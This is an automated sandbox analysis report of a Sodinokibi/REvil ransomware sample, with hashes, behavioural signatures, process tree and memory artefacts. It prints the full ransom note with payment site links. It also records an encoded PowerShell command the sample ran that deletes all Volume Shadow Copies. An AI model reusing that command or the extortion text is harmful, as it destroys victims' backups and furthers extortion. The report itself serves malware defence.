Resubmissions

16-06-2024 14:39

240616-r1f9ys1dpj 10

Analysis

  • max time kernel
    92s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-06-2024 14:39

General

  • Target

    b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe

  • Size

    166KB

  • MD5

    b4070a6d33fd166e115bd0cb2268b7ca

  • SHA1

    9f8510cee0c696b3c986c619b012acd19db9a7e7

  • SHA256

    4dd6435f7a4bf6b1ce2e3479230e6d1f9b8730000d3c261ceb3457407bffb701

  • SHA512

    3137b62656a2aee8b65f6dd0e4c79818044bc973f99af878875a3e0fc1a3ab97cea8cd8eaf68377c86840ae680f285893d485c3f521304be0d99751b3a7498dc

  • SSDEEP

    3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3QvOYiEyYFarnufJIIn:ZJ0BXScFy2RsQJ8zgZyYFaifx

Score
10/10

Malware Config

Extracted

Path

C:\Users\9deog592-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 9deog592. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6B4B5870DF576762 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/6B4B5870DF576762 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 8RfIgI/GcRRYUgNGyExltmkT1DZzXnoiU+Gt/qSf7kdCxPIPaStCbQGFeAfTVzNU tT1FhNwub+BNxs+p7OYF6LlsgZL136QBcQWKFjHfZJt+/ShkBbKxWS7oa5kiG333 Z2e+PO/OVLZAtvjT/rIJpVMf6ZRiGWklzxYW9AwFytDbMrnHT339O0jhCqSlAnz+ o2ayVDcbJ5Ei3rf+uHcXBSNH14LV/4NUjShBj0xZJvAvFAak6pHuqS2p94Hvps5Q bweGnkQpZQAZEywFplK8sFJAUkGmUQDyrelLZC9MM2Cxn9mp9RPS7olp8kjMXERO MIEetyCXnUiltwNp73JFUx9eG6wkP/dzkYUY9asmgThdcXXcFacQq3KwlV7AMPBO 5ysLO9QIgx//bCgKt0qNIcZeCBPm5L6B5vKVbC8Q9iQjuXm++PzEisU7syWq54Co RY144wtqh009FNGICve9cWPx/utyqQk5F7GOEc9H1QrPn0njfoGQpJrqY11GUCuK 4wjwF/r8pEtDhEF0/oHUGzeo+P05aTThKjRQiFqlS3SeAahVbOLCqdQkEVTd2Gse pOlTB4m0IIpKVIo8aRx4a00wldoBY/ad/SFWOnPHyYbRzUClAHZ6/97UawRUhtPL jVvf2NhTFs0Tt00pTMSBSplFl00eFEPAa1Xz79iIa8UhXSpii/1SSnGS3NcJV04o gq2h1EXqgaW3+67WtDOYAug5k9BNfyCTL7dNDOGfAKVmEp2ifel8DIIOVWPUzMH7 T/wpbkjqdMqdKtD7WCbYAsdtAwLBpd8sW6wh2NO89uYdmt7fSBFuXg3/UaMpgiPe RDpHwfLso8yY0N53Ki0FT9DQL1RC4keUQ9ze99CizArXBtL2eQjWGG6IahCi9vSo 2U6zbN2Dc3biGkYaoBXK5AcYH3bf/jnkCAlCpS2ieynzY+wJ7NCCgtu6yMhZvXQg faoTbQ9gIxjgbjza3/XOf0UWOSJppYf4Krjlw2N6T2OS9D95/peT7O4MY94HywQH FKYPA00I6WPRuJ6uYNVlVDBsfB8cZxEjGV1iliw+ao9KxY8Xj5Rv9JQmeDi9NJIz y4SwHFny86mrkfUJfsYgt6/Hv8fEY9K8vchaS8lmbs45LzaGnL5WTx0ylTg9xM1/ n2dLPgZjwygqYNP3i8ralkMj2tPTEtiDHibLKXbmOluVUGdNHlxvAu00XoWypBKq vvTy/G8290bLe3flu2YZrl6M0o4Dt8Kyg4oQEELX/DRciHy0SdIyiJQ62pJCX2tZ KCV+r5DGEKuPSt3QRA2KEn9nOI1r8R34tjsrmRO+CQa+nDE8ZfeMR32FLJm7W4lv YmV8vNacuUjQwaiR3H8a+to76UV2K4vNRUCnzX26jIMUZJwQfJP+8A== Extension name: 9deog592 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6B4B5870DF576762

http://decryptor.cc/6B4B5870DF576762

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 32 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3440
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2804
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:4700
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2280

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\9deog592-readme.txt

      Filesize

      7KB

      MD5

      0539913193a6ec547812feaed994036b

      SHA1

      9f423cb2c36f49aea6d6a28dd3ae245cc97a2715

      SHA256

      4c08e0d4f4f5f49e57ca5fe92ae5f86aaf2cd403979ccb0f63ddbbf647bab295

      SHA512

      45058fcc4a8aa1ac54fd79227426a5d269170844c96d62a0d2e350d16e821a8df470368ce68db0310cf3c57220fd6314709c90b9dc1ca7d2bff4f4be564dfbe5

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w2svp1wg.2jr.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2804-0-0x00007FFB4C203000-0x00007FFB4C205000-memory.dmp

      Filesize

      8KB

    • memory/2804-1-0x00000254342E0000-0x0000025434302000-memory.dmp

      Filesize

      136KB

    • memory/2804-11-0x00007FFB4C200000-0x00007FFB4CCC1000-memory.dmp

      Filesize

      10.8MB

    • memory/2804-12-0x00007FFB4C200000-0x00007FFB4CCC1000-memory.dmp

      Filesize

      10.8MB

    • memory/2804-15-0x00007FFB4C200000-0x00007FFB4CCC1000-memory.dmp

      Filesize

      10.8MB